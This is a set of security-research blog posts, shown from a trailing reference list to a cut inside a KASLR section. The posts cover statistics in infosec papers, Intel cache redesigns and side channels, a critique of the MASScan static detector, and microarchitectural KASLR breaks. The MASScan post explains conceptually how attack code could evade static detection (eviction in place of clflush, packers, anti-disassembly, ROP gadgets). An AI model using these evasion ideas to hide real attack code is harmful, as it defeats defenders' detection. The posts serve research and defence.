[2] Tomasulo, Robert M. (Jan 1967). “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. IBM Journal of Research and Development. IBM. 11 (1): 25–33. ISSN 0018-8646. doi:10.1147/rd.111.0025.

[3] Fogh, Anders. “Covert shotgun: Automatically finding covert channels in SMT”

https://www.youtube.com/watch?v=oVmPQCT5VkY.

[4] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.”

Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

[5] Evtyushkin D, Ponomarev D, Abu-Ghazaleh N. Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR. InProceedings of 49th International Symposium on Microarchitecture (MICRO) 2016.

Statistics and Infosec

Introduction

The work by John Ioannidis [1] among others started the “reproduction crisis”. The “reproduction crisis” is the phrase used to describe that in many branches of science researchers have been unable to reproduce classic results which form the basis for our understanding of the world. Since the basic principle of modern science is about standing on the shoulders of giants, it is incredibly important that sound methodology is used to insure that our foundation is solid. For now the reproduction crisis has hardly reached information security and I hope it will stay that way. But unfortunately the information security scene is full of issues that make it vulnerable to reproduction problems. Top among them is methodology and the lack of reproduction studies. A huge amount of papers is accepted as true, but never reproduced and many papers suffer from methodologic problems.

In this blog post I will argue that among information security papers, very basic statistics could improve the process and reproducibility. Statistics is important as soon as observed data are noisy. Noisy data are everywhere even in computer science. Users are non-deterministic, unobserved variables, manufacturing variance, temperature and other environmental influences all effect our measurements. This of course does not mean that we cannot say anything meaningful about computers – it just means we need to embrace statistics and so far the information security science has not been very successfull at that. This purpose of this blog post is to suggest a baby step in the right direction – using sample size, mean and standard deviation as a mean of improving the expose on noisy data. I intentionally keep the theory short – I encourage everybody to read a real statistics book. Also, with the intention to provoke, I picked two examples of papers where the statistics could have been done better.

Statistics, Sample Size, Mean, and Standard Deviation 101

During a lecture my first statistics professor said that he would automatically flunk any of us in the future if we reported on noisy data without mentioning 3 data points on them. These data points are the sample size (N), the mean, and the standard deviation. The first reason for bringing these three data points is that it is as close as one gets to a standard in science . It is accepted in other sciences ranging from physics over medicine to economics. Having a standard on reporting noisy data allows us to compare studies easily and gives us an easy way to reproduce the findings of other people. Unfortunately, this standard appears to not have arrived in full force in information security yet.

But it is not only about a standard. The thing is: using these three values is not just a historical accident. There is sound theory why we want these three values. Imagine a process generating our data – usually called the data generating process or d.g.p. If the d.g.p. produces observations where the noise is independent of other observations we say the d.g.p. produces independent, identically distributed observations or i.i.d. If observations are not i.i.d. we cannot treat any variation as noise and consequently we need further analysis before we can draw any conclusion based on the data. Hence, i.i.d. is often assumed or considered a good approximation. And very often there are good reasons to do so.

With i.i.d. data the arithmetic mean of our observations will almost surely converge towards the mean of the d.g.p as the number of observations increases. This is called the law of large numbers. If one rolls a dice a thousand times and gets an arithmetic mean of 3.0, it is an indication that the dice is not a fair dice. This explains why we wish to report the arithmetic mean. If the number of samples is sufficiently high, then the arithmetic mean is “close” to the real mean of the data generating process.

Also with i.i.d. data the central limit theorem almost always applies. The central limit theorem says that we can expect the mean to tend towards normally distributed as the sample size increase. The normal distribution is characterized by only two parameters, its mean and its standard deviation. It allows us to check hypothesis about the data. The most basic tests can even be made on the back of an envelope. This allows to put a probability on the dice used in the previous example not being a fair dice – that we are not just observing noise.

Why we should include the sample size should be pretty obvious by now. Both the law of large numbers and the central limit theorem hinge on convergence over the sample size. Thus if we have a small sample size, we are unable to rely on any conclusions. That should not surprise you. Imagine throwing a dice 3 times getting 1,2, and 4 – you would be a fool to insist that your data show that 6 rarely happens. If you have thrown the dice a million times and do not see any 6’s the dice almost surely is not fair and the aforementioned conclusion would be pertinent.

In most first (or second if applied with rigor) semester statistics books, you can find a discussion on estimating how many samples you need based on the estimated standard deviation from a pilot sample or prior knowledge on the d.g.p. That of course can be turned around to evaluate if a study had sufficient sample size – yet another reason why these three numbers are valuable.

In short three small numbers in a 14 page paper can provide deep insight into the soundness of your methodology as well as making your paper easily comparable and reproducible.If you are in doubt, you need to bring these 3 numbers. One word of caution though: I think these numbers are necessary but they may not be sufficient to describe the data. Also you will have no quarrel with me if I can easily calculate the standard deviation from reported data . For example report variance instead of standard deviation or omitting the standard deviation when reporting on proportions (the Bernoulli distribution is described only by its first moment) is just fine.

Case study 1: A Software Approach to Defeating Side Channels in Last-Level Caches

I will start out with a pretty good paper that could have been better if standard deviation and mean had been mentioned: “A Software Approach to Defeating Side Channels in Last-Level Caches “ by Zhou et al. [2]. The authors develop CacheBar – a method to mitigate cache side channel attacks. For Flush+Reload attacks they do a copy-on-access implementation to avoid sharing memory which effectively kills Flush+Reload as an attack vector. I shall concentrate on Zhou et al.s [2] protection against Prime+Probe. For this purpose, Zhou et al [2] use an overcommitted page coloring scheme. Using overcommitted page coloring allows for a significantly more flexible memory allocation and thus less performance penalty than the classic page coloring scheme. However, an attacker will remain able to Prime a cache set to a certain extend. Consequently, the scheme does not defeat Prime+Probe, but it does add noise. The paper analyzes this noise by first grouping observations of defender demand on a cache set into “None, one, few, some, lots and most” categories. They subsequently train a Baysian classifier on 500.000 Prime+Probe trials and present the classification result in a custom figure in matrix form. I have no objections thus far. If the authors think that this method of describing the noise provides insights then that is fine with me. I am however missing the standard deviation and mean – they do offer the sample size. Why do I think the paper would have been better if they had printed these two values?

The categories are arbitrary: To compare the results to other papers with noise (say noisy timers) we would have to categorize in exactly the same fashion.
Having reported means we would immediately be able to tell if the noise is biased. Bias would show up in the figures as misprediction but an attacker could adjust for bias.
With standard deviation we could calculate on a back of an envelope how many observations an attacker would need to actually successfully exfiltrate the information she is after and thus evaluate if the mitigation will make attacks impractical in different scenarios. For example, you can get lots of observations of encryption, but you cannot ask a user for his password 10000 times.
Reproducing a study will in the presence of noisy data always have slight differences. When the black and white matrix figures are close enough to consider reproduced? For means and standard deviation that question has been resolved.

That all said, I do not worry about the conclusion of this paper. The sample size is sufficient for the results to hold up and the paper is generally well written. I think this paper is a significant contribution to our knowledge on defending against cache side channel attacks.

Case study 2: CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks

Caveat, Apology and More Information

Before I start with my analysis of the statistics in this paper, I should mention that I had given my off-the-cuff comments on this paper before and I generally stand by what I wrote on that occasion. You will find my comments published in Security Week[6]. I did get one thing wrong in my off-the-cuff remarks: I wrote Brasser et al [3] draws heavily on Pessl et al. [4]. Brasser et al. do not use the Dram-mapping function used by Pessl et al.[4], as I initially thought they did. Instead, they use an ad-hoc specified approximate mapping function. Also it is very important to mention that I am referring to an early version of the paper on archiv substance to my previous off-the-cuff remarks or what I write in this blog post. As my critique of the paper is relatively harsh, I emailed the authors ahead of posting the blog post. As of publishing the blog post, I have not yet received an answer.

Getting dirty with it

“CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks” by Brasser et al. [3] implements two mitigations for the rowhammer problem: B-Catt and G-Catt. G-Catt uses memory partitioning, so that the kernel is not co-located in the same banks as user mode memory which prevents code hammering the kernel space from user mode. I am not convinced that G-Catt cannot be circumvented but that is not the subject of this blog post. I will instead focus on B-Catt. Kim et al [5] suggested not using vulnerable memory addresses and B-Catt implements this idea in a boot loader, rather elegantly using int 15h, subfunction 0xe820 which provides the operating system a list of memory regions it should avoid using. If the computer is not using any vulnerable addresses, one cannot flip bits with row hammer and the system is safe. Obviously, not using some of the physical memory comes at a cost for the end user. Kim et al. [5]concluded that “However, the first/second approaches are ineffective when every row in the module is a victim row (Section 6.3)”. Contrary, Brasser et al.[3] concludes: “…we demonstrate that it is an efficient and practical solution that effectively prevents rowhammer attacks as a short-term solution”. So, the big question is who it gets right here. The key issue is how many pages contain bit flips. Kim et. Al[5] do not provide numbers on pages, but Brasser et al do. They evaluate 3 test systems to support their conclusion: “However, our evaluation (Section VI-A2) suggests that only a fraction of rows are vulnerable in practice.”

And this is where my gripe with the statistics in this paper is. Sometimes you can get away with a tiny sample size. That is when you have prior evidence that the sample variance is either irrelevant or negligible. Relevance of the variance here is given. The prior evidence of a small variance is not present. In fact, I will argue quite the contrary in later.

But first let me get rid of the terrible loose language of “practical and efficient”. My 15 year experience as a professional software developer tells me that software needs to work as advertised on at least 99% of the systems. That is in my opinion a conservative value. Further assume that 5% memory overhead is acceptable for B-Catt users. Notice here that I defined practical as a fraction of systems that must be running with an acceptable overhead. The alternative would have been defining practical as a maximal acceptable average overhead. I consider the fraction approach the most applicable approach in most real world scenarios – it certainly is easier to do back-of-envelope calculations with, which I will be doing for the remainder of this blog post.

Now we can put the sample size of 3 into perspective. Imagine that in reality 10% of systems have more pages with bit flips than are acceptable. With a sample size of 3 that gives us a 73% (0,93) chance that our evaluation will be “suggesting” that we are indeed practical. Being wrong 73% of the time is not a suggestion of being right. We need more data than 3 observations to assume practicality. Obviously, you may argue that my 10% is pulled out of a hat – and it is indeed. It is a conservative number, but not unrealistic.

This leads us to the question of how much data do we need? The answer to that question depends on the variance in the data, something that we do not know. So, we can either make an a-priori guess based on domain knowledge or do a pilot sample to get an idea. My first semester statistics book [6] states: “We recommend taking at least 20 observations in a pilot sample”. Pp. 419. So, the author’s samples do not even qualify as a pilot sample.

So we are left with turning to domain knowledge. Kim et. al [5] in my opinion has the best available data. They sample 129 modules but do not mention the number of affected pages. They do however mention that 3 modules have more than 40% affected rows. On a two channel skylake system (to my knowledge the best case) we can have 4 rows per page and assume all bit flips occur so that the smallest number of pages are affected – then we end up with 3 modules with at least 10% overhead out of 129. Thus no lesss 2,3% of modules will have too much overhead, according to my definition, in Kim’s samples. This certainly constitutes a reason for skepticism on Brasser et al’s[3] claims.

Kim et al. [5] unfortunately do not calculate a mean or standard deviation – they do report their complete data, so that I could calculate it, but instead I will use a bit of brute force to get somewhere. We know that rowhammer is fairly bad because 6 of 129 samples have more than 1 million bit flips. Assuming that each cell is equally likely to flip that gives us a 14,8% probability that a given page is vulnerable for any of these 6 modules. This assumption has weak support in Kim et. al. [5] Consequently, at least 4.6% of the modules are not practical under my definition and my fairly conservative assumptions. With a finite base of modules (200) and under the assumption that modules are equally common in the wild and 129 observations, we can calculate a 95% confidence interval. This confidence interval tells us that between 2.44% – 6.76% of the assumed 200 modules in the population are vulnerable. Obviously, it is not realistic to assume only 200 modules in existence, but if there are more the confidence interval would be even larger. Thus, under these assumption we must dismiss that B-Catt is practical with 95% confidence. It looks like B-Catt is in trouble.

The assumptions above are of cause very restrictive and thus more research is required. What would this research look like? A pilot sample with at least 20 samples would be a good start. Alternatively, we could use my above assumptions to calculate a sample size. If we do this we end up with the number 80.

Obviously, everything here rides on my definition of practicality and efficiency. My gut feeling is that B-Catt won’t turn out to be practical if we had a reasonable sample. Nevertheless I would love to see data on the issue. While I think my assumptions are fair for a mainstream product, there might be special cases where B-Catt may shine. For a data center that can search for a ram product with few bit flips B-Catt may very well be a solution.

Literature

[1] Ioannidis, John PA. “Why most published research findings are false.” PLos med 2.8

(2005): e124.

[2] Zhou, Ziqiao, Michael K. Reiter, and Yinqian Zhang. “A software approach to

defeating side channels in last-level caches.” Proceedings of the 2016 ACM SIGSAC

Conference on Computer and Communications Security. ACM, 2016.

[3] Brasser, Ferdinand, et al. “CAn’t Touch This: Practical and Generic Software-only

Defenses Against Rowhammer Attacks.” arXiv preprint arXiv:1611.08396 (2016).

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM addressing for cross-cpu

attacks.” Proceedings of the 25th USENIX Security Symposium. 2016.

[5] Kim, Yoongu, et al. “Flipping bits in memory without accessing them: An

experimental study of DRAM disturbance errors.” ACM SIGARCH Computer

Architecture News. Vol. 42. No. 3. IEEE Press, 2014.

[6] Berry, Donald A., and Bernard William Lindgren. Statistics: Theory and methods.

Duxbury Resource Center,

[7] Kovacs, Eduard. “Researchers Propose Software Mitigations for Rowhammer

Attacks” http://www.securityweek.com/researchers-propose-software-mitigations-

rowhammer-attacks

New cache architecture on Intel I9 and Skylake server: An initial assessment

Intel has introduced the new I9 CPU which is seen as HEDT (High-End-DeskTop) product. The micro architecture is in many respects shared with the new Skylake server micro architecture.I f history is a guide technology introduced in this segment slowly trickles down to more budget friend desktops. From a Micro architecture point of view it seems that several things about these CPU’s will force changes on micro architectural attacks – especially in the memory subsystem. In this blog post I’ll do a short overview on some of relevant changes and the effects they’ll may have on micro architecture attacks. Since I don’t own or have access to an actual I9 processor or Skylake server processor this blog post is just conjecture.

Resume of the “old” cache hierachy

The major changes over earlier process from a micro architecture point of view is that the cache system has received a significant overhaul. Current Intel CPUs have a 3 level cache hierarchy – two very small L1 caches, one for data, one for instructions. The second level cache (L2 or Mid Latency Cache) is somewhat larger. L1 data, L1 code and L2 part of each core and private to the core. Finally, Intel CPU’s had a huge 3rd level cache (usually called L3 or largest latency cache) shared between all cores. The 3rd level cache is subdivided into slices that are logically connected to a core. To effectively share this cache, Intel connected them on a ring bus called the Quick Path Interconnect. Further the 3rd level cache was an inclusive cache, which means that anything that is anything cached in L1 or L2 must also be cached in L3.

Changes

Some of the important changes that has been announced in the Intel Software Optimization Manuals [1] are:

– A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

– A reduced over all cache size per core (compared to similar older models)

– A very significant increase in the size of the L2 (factor of 4)

– Doubled the bandwidth of L2, while only slightly increasing the latency

– Slightly more than offset by a reduction of the shared L3.

– Reorganized L3 cache to be a non-inclusive cache

– Replaces the QPI with a mesh-style bus.

Why does these changes make sense?

Increasing the size of L2 on the cost of L3 makes sense as the L2 is much faster than L3 for applications – one can only assume that making the L3 helps reduce die size and cost. Also the increase in size of the L2 caches reduces the marginal utility of the L3. Finally as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in L3 is a problem Intel has battled before. With Haswell they introduced Cache Allocation Technology (CAT) to allow software to control cache usage of the L3 to deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring buffer design. There is a penalty for having memory served from another core’s slices. On a ring bus this penalty is proportional to how far the cores are a part on the ring. With more cores, this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes with a cost as the same data are loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of the (L2 +L1) to L3 sizes. Previous this ratio has been around 1:10 (depending on actual CPU), but multiplying the L2 size by 4 and making the L3 a tiny bit smaller the ratio is now about 1:1.5. Thus the making the L3 cache non-inclusive is very essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive meaning the content of L3 cannot be loaded in L1 and L2. I think Intel would have used the defined term exclusive if the cache really where exclusive. Thus, it is probably fair to assume that non-inclusive means that data may or may not be cached in L1, L2 and L3 at the same time, but exactly how this is governed is important. Unfortunately there is no information available on this.

It’s worth noting that many of these changes has been tested and developed by Intel for the Knights landing micro architecture. Knights landing is a high throughput micro architecture, sold in relative small amounts. Thus it’s likely that many features developed for this CPU will end up being trickled down. It’ll be interesting to see if Intel plans to trickle it down into laptop/small desktops or use different cache designs for different classes of CPUs.

Effects

Cache side channel attacks

This new cache layout is likely to have profound effect on cache side channel attacks. I think Flush+Reload will work even without the non-inclusive cache. The flush primitive is based on the CLFlush instruction which is part of the instruction set architecture (ISA). Intel has been very reluctant in the past to change the ISA and therefore my estimate is that flushing will work as always. I think the reload primitive will remain active – I find it likely that an uncached load will also load stuff into the shared L3. Also it’s likely that the QPI replacement bus can be used to fetch data from private L2 caches similar to AMD’s cross CPU transmission. This will give Flush+reload a nice flush+transfer flavor, but it’ll still work. For more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled in someway we can fairly certain that at least one of these things are true, if not both. The latter being my guess.

The big change are likely to be related to evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can can load stuff into another core’s private hierarchy. Thus, the prime and evict primitives for cross core attacks. However,both are likely to work decently within a core (Hyper threading or scheduling on same core).

While the ISA behavior of CLFLush is almost certain to remain unchanged, the micro architecture below it will see significant changes. With QPI gone using the flush+flush attack by Gruss et al. [3] to find out how many hubs on the ring bus away you are from a particular slice almost certainly won’t work. This does not mean that you won’t find a side channel here in CLFlush, buses are typically bandwidth limited thus being an obvious source of congestion – without an inclusive L3 the bus bandwidth might even be easier to consume. Also the Flush+Flush attack as a Flush+reload replacement, is likely to produce a different timing behavior in the new micro architecture. My guess upfront is that a timing difference and thus a side channel remains.

Also affected by the non-inclusiveness of the L3 is row buffer side channel attacks such as those presented by Pessl. et al.[4] Without an effective eviction cross core attacks may be severely stifled. The ability to reverse engineer the DRAM complex mapping function is likely to remain unchanged as it hinges not on eviction, but the CLFlush instruction’s ISA behavior.

With the CLFlush instruction and evict likely still working on local cores, row hammer will remain effective. But in some scenarios, indirect effects of micro architecture changes may break specific attacks such as that of Sarani Bhattacharya, Debdeep Mukhopadhyay [5]. The reason is that such attacks rely on information leakage in the caches, that becomes more difficult to leverage as described above.

Future

While the changes to the cache makes sense with the significant number of cores in the affected systems, it seems unlikely that the changes will trickle down to notebooks and laptops. With only two cores the existing cache design seems sensible. Thus we are likely to see a two tier cache design moving on.

Conclusion

Having a non-inclusive L3 cache is significantly more secure from a side channel perspective than an inclusive in cross core scenarios. This opens up for defending these attacks, by isolating different security domains on different cores potentially dynamically. While flush+reload is likely to be unaffected, this attack is also the easiest to thwart in real life scenarios as avoiding shared memory cross security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these micro architecture changes.

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.a

[3] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

MASScan & the Problems of Static Detection of Microarchitectural attacks

Introduction

Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort Irazoqui et al. [1] puplished an interesting paper on static methods to detect microachtitetural attacks which is titled “MASScan: Stopping Microarchitectural Attacks Before Execution”.
The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to changes.

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. In this case, ‘attack context’ is defined as code which is either required for an attack to work, or because it improves an attacks’s performance. The list is:

Cache flushing instructions

Clflush, clflushopt
(the authors do not mention this clflushopt, but I have included it for completeness)

Non-temporal instructions

monvnti & movntdq

Timers

Counter threads, performance counters, rdtscp, rdtsc instructions and attempts to set thread affinity to gain core co-location which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instruction

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Zombie’s [5] opcode list (which unfortunately is outdated at the time of writing) 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the author’s notion.

The good part is that solid static analysis is able to effectively spot problems, and highlight them to a human analyst. Further manual analysis can be performed based on those indicators to identify malignant behavior, suspicious cases or to vet out false positives. What makes this approach somewhat challenging is the fact that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers try to actively evade static analysis.
The following is to demonstrate what such an evasive action might look like.

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties are undecidable. In short, obfuscation is difficult to deal with. The bad news is that microarchitectural attacks are non-trivial semantic expressions and as such, as per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without being able to pinpoint the “right” way. You will never be able to deduce from the semantic output which all syntax representation that cause it.

The example I like to use is this: One could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics, but a different syntax. Obviously one could then build a new interpreter that processes the first interpreter’s syntax output and so on and so forth. Consequently, we cannot generate a database of syntax representation for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation or obfuscation for that matter. They often rely on rare syntax elements (rare instructions). Execution time is a very real concern and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean it’s impossible.

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instructions can replaced by eviction code as demonstrated by Oren et al. [2] as well as Gruss et al [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush for use as an answer to a semantic question.

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign for such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounters API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways. This makes a static analysis fairly cumbersome.

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonic increasing, only deterministically changing. As the CPU’s are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged. This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASRL) can be repeated. This allows a low accuracy timer to be used multiple times and then using the law of large numbers to average out the noise.

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack could often do without them. For instance, Oren et al. [2] does prime+probe in Javascript without a fence. Flush+Reload works fairly decent without fencing as well. Also, makeshift fences can in some cases be produced by gaming reordering. For instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult to replace for an attacker. It should be noted that on Microsoft Windows the Interlocked* API functions use the lock prefix and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards in Gruss et al. [4] . Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. We could argue with a performance penalty in this case. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!

It gets worse from there: For row hammer I suggested that we do not need not use eviction. Instead, we could bring the cache coherency policy into play to cause write back into memory, see Fogh [8]. This provides yet another algorithm to detect for protection against row hammer, which of course can be implemented in many different ways.

Classic malware obsfuscation – Anti static analysis methods

Copy protections and malware has historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995. Packers go back further than that, though. Once an executable has been packed, the only code that is now available to static analysis in the first stub of the unpacker. Unfortunately, malware authors are aware of this technique and it’s even available for purchase online as part of COTS malware as a service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk or even in memory to avoid static analysis. Techniques such as “Run-PE” are widespread in real world malware.

Another example of self-modifying code is JIT compiling, which is what Javascript does. In fact, I use the keystone assembler JIT style for building microarchitectural attacks fairly often, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious java script is entirely possible and Oren et. Al demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and subsequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis is already commonplace and no longer qualifies as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed either based source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons. This only leaves disassembly as a method for analysis. Unfortunately, however, the x86 platform has a non-fixed length of opcodes. This results in problems to locate the starting point of an instruction. Historically this has been used as a means to thwart disassembly. A clflush instruction can easily be hidden from disassembly as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (In the simplest form) assembles to 3 bytes of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. In there, the code is validated during compiling and run in a sandboxed environment to make sure that none of the above tricks are used. Validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Never-the-less requiring intermediate language representation (say LLVM) when submitting to a shop may assist the authors intention, but many of the issues mentioned above including Rice’s theorem itself applies to intermediate language representations as well.

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’. We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – this is especially true if the “feature set” is small and malleable. This limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and mallable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. Static analysis could be augmented with symbolic or even concolic analysis to improve accuracy. However these methods scale poorly and have issues of their own. Given that it produces a <6% false positive ratio, static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach which I consider the most promising stop-gap-solution.
For instance, my flush+flush detection blog post [7] or my work with Herath on detecting row hammer and cache attacks at BlackHat 2015 using performance counters [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws, either. But from an attacker’s point of view they are at least more difficult to work around as they are often behavior-based and consequently circumvent the problem presented by the Rice theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.

Literature

[1] Irazoqui, G., Eisenbarth T., an Sunar B. MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical cache attacks in javascript and their implications. In Proceedings of the 22Nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in javascript. In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment -Volume 9721 (New York, NY, USA, 2016), DIMVA 2016, Springer-Verlag New York, Inc., pp. 300{321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating attacks on inclusive last level caches. In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Nishat, H., Fogh, A. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. See also http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. Http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI- http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Micro architecture attacks on KASLR

Introduction

Recently a number of different micro architecture attacks on Kernel Address Space Layout Randomization(KASLR) have been published. The idea behind KASLRis that code reuse attacks and read/write primitives are useless if the attacker is unable to tell where what code/data is. Consequently modern operating system randomizes the virtual addresses where code/data is stored. However it turns out the CPU leaks information about the address space layout causing failure in the defense. This blog post shortly summarizes the 4 known micro architecture attacks on KASRL and discusses potential mitigations. Part of the mitigation portion will be speculative. Bias up front: I’m a coauthor of the prefetch attack and quite like it.

What Do I mean by micro architecture KASLR break

When I wrote my first blog post [8] on breaking KASLR with micro architecture, I got criticized for using the term “micro architecture”. What I mean to convey when I use this term is that there is nothing in the Instruction Set Architecture (ISA) that specifies that the x86 has to work in ways that allows us to attack KASLR. Rather the features that are being used, are part of the implementation of the ISA. This usage of the term seems in line with common usage in the academic literature. There have been attacks on KASLR using page deduplication e.g. Barresi et al. [1] which some consider a microarchitecture attack. I however, do not and will thus not include these attacks in this discussion.

History of micro architecture KASLR breaks

Using page faults

Hund, Willems & Holz [9] was the first to publish an attack on KASLR. They use a combination of a classical prime+probe cache attack and a novel attack on the paging caches the time it takes for a fault to be thrown on unprivileged access to a page on x86-64 differs significantly depending on weather the translation is cached in the paging caches. An attacker can measure this difference. Further even an unprivileged access to a page causes the translation caches to be loaded and consequently you can use a timing difference attack to tell if memory is mapped on a certain location. They called this the “double page fault” attack.

Using Prefetch

I wrote a blog post in January [8] that become my starting for the paper by Gruss et al [6]. The Hund, Willems & Holz [9] attack suffers from the drawback that the timing is measure across the page fault handler which adds significant noise. This makes the attack itself slow and due to noise the attack needs to be repeated a significant amount of times to become reliable. What I and my coauthors noted was that the prefetch instructions do not cause page faults – they terminate silently. They do however have the same timing properties, as they do the same look ups. Consequently replacing page faults with the prefetch instruction provides a faster and more reliable KASLRbreak.

Using TSX

Wojtczuk wrote in a blog post [3] that intel TSX technology might make Hund, Willems & Holz’s [9] attack significantly more practical. Jang et al.[ 2] took this up and showed Wojtczuk [3] was right. TSX works by being able to roll back a set of memory accesses, if they cannot be completed immediately due to conflicting access in the relevant portions of the memory sub system – much like transactional access to databases. However, access to a page that would normally trigger a page fault inside a transaction now just causes a rollback. Consequently, a significant speed up and reliability gain can be had by wrapping your “probe” in a TSX section.

Using Branch Target Buffer

